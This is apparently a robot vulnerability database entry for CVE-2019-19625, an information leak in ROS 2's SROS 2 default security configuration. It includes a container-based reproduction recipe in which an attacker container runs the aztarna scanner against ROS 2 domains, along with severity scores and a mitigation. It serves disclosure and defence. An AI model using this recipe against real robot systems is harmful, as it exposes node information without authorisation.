Open
Description
cve: CVE-2019-19625
cwe: CWE-200 (Information Exposure)
description: We found that SROS 2, the tools to generate and distribute keys for ROS
2 and use the underlying security plugins of DDS from ROS 2 leak node information
due to a leaky default configuration as inidicated at https://github.com/ros2/sros2/blob/master/sros2/sros2/policy/defaults/dds/governance.xml#L13.
This exposure was first raised in the Security Workshop of ROSCon 2019 (Nov. 2019).
Further debugging the flaw indicates that there might be some additional underlying
issues.
exploitation:
description: A simple use of ros2cli allows to exploit this flaw. See https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
for a walkthrough.
exploitation-image: Not available
exploitation-vector: Not available
exploitation-recipe:
networks:
- network:
- driver: overlay
- name: net1
- encryption: true
- subnet: 12.0.0.0/24
- network:
- driver: overlay
- name: net2
- encryption: false
- subnet: 13.0.0.0/24
containers:
- container:
- name: subject1
- modules:
- base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
- network: net1
- container:
- name: subject2
- modules:
- base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
- volume: registry.gitlab.com/aliasrobotics/offensive/alurity/deve_atom
- network: net1
- container:
- name: attacker
- modules:
- base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
- volume: registry.gitlab.com/aliasrobotics/offensive/alurity/reco_aztarna
- network:
- net1
- net2
flow:
- container:
- name: subject1
- window:
- name: unsecure
- commands:
- command: "source /opt/ros2_ws/install/setup.bash"
- command: "export ROS_DOMAIN_ID=0"
- command: "ros2 run demo_nodes_cpp talker"
- split: horizontal
- command: "source /opt/ros2_ws/install/setup.bash"
- command: "export ROS_DOMAIN_ID=0"
- command: "env | grep ROS" # this shows there's no security enabled at this point
- select: unsecure
- container:
- name: subject2
- window:
- name: secure
- commands:
- command: "source /opt/ros2_ws/install/setup.bash"
- command: "export ROS_DOMAIN_ID=1"
- command: "env | grep ROS" # this shows there's no security enabled at this point
- command: "ros2 run demo_nodes_cpp talker"
- command: "export ROS_SECURITY_ENABLE=true"
- command: "export ROS_SECURITY_STRATEGY=Enforce"
- command: "export ROS_SECURITY_ROOT_DIRECTORY=/opt/ros2_ws/keystore"
- command: "export ROS_SECURITY_LOOKUP_TYPE=MATCH_PREFIX"
- command: "env | grep ROS" # from this point on, there's security enabled
- command: "ros2 run demo_nodes_cpp talker"
- split: horizontal
- command: "source /opt/ros2_ws/install/setup.bash"
- command: "export ROS_DOMAIN_ID=1"
- command: "cd /opt/ros2_ws/"
- command: "mkdir policy"
# generate a security policy based on our current graph
- command: "ros2 security generate_policy policy/my_policy.xml"
- command: "cat policy/my_policy.xml"
# populated the keystore for all profiles
- command: "ros2 security generate_artifacts -k keystore -p policy/my_policy.xml -n /_ros2cli"
- command: "kill -9 $(pidof talker)"
- select: secure
- container:
- name: attacker
- window:
- name: attacker_window
- commands:
- command: "source /opt/ros2_ws/install/setup.bash"
- command: "aztarna -t ros2 -d 0 --daemon -e"
- split: horizontal
- command: "source /opt/ros2_ws/install/setup.bash"
- type: "aztarna -t ros2 -d 1 --daemon -e"
- select: attacker_window
- attach: subject2
flaw:
application: any ROS 2 node communicating
architectural-location: platform code
date-detected: null
date-reported: '2019-12-06'
detected-by: Victor Mayoral Vilches and Lander Usategui San Juan (Alias Robotics)
detected-by-method: runtime detection
issue: https://github.com/aliasrobotics/RVD/issues/922
languages: Python
package: sros2
phase: runtime-operation
reported-by: Victor Mayoral Vilches and Lander Usategui San Juan (Alias Robotics)
reported-by-relationship: security researcher
reproducibility: always
reproduction: https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
reproduction-image: Not available
specificity: ROS-specific
subsystem: cognition:middleware
trace: N/A
id: 922
keywords:
- Robot Operating System 2
- ROS 2
- eloquent
- dashing
links:
- https://ros-swg.github.io/ROSCon19_Security_Workshop/
- https://github.com/ros-swg/turtlebot3_demo
- https://github.com/ros2/sros2/blob/master/sros2/sros2/policy/defaults/dds/governance.xml#L13
- https://design.ros2.org/articles/ros2_dds_security.html
- https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
mitigation:
date-mitigation: null
description: Modify the policy and set rtps_protection_kind to ENCRYPT
pull-request: https://github.com/ros2/sros2/pull/171
severity:
cvss-score: 7.5
cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
rvss-score: 6.5
rvss-vector: RVSS:1.0/AV:AN/AC:L/PR:N/UI:N/Y:Z/S:U/C:H/I:N/A:N/H:N
severity-description: high
system: ros2
title: 'RVD#922: SROS2 leaks node information'
type: exposure
vendor: ''